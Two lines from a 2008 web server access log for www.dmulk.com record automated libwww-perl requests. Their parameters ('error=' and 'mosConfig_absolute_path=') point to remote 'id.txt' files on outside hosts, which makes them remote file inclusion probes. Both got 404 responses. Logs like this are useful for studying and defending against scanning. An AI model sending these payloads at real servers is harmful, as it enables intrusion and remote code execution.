216.246.53.83 - - [24/Jul/2008:08:01:23 -0700] "GET /logs/access_080326.log/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:08:01:25 -0700] "GET /logs/access_080313.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
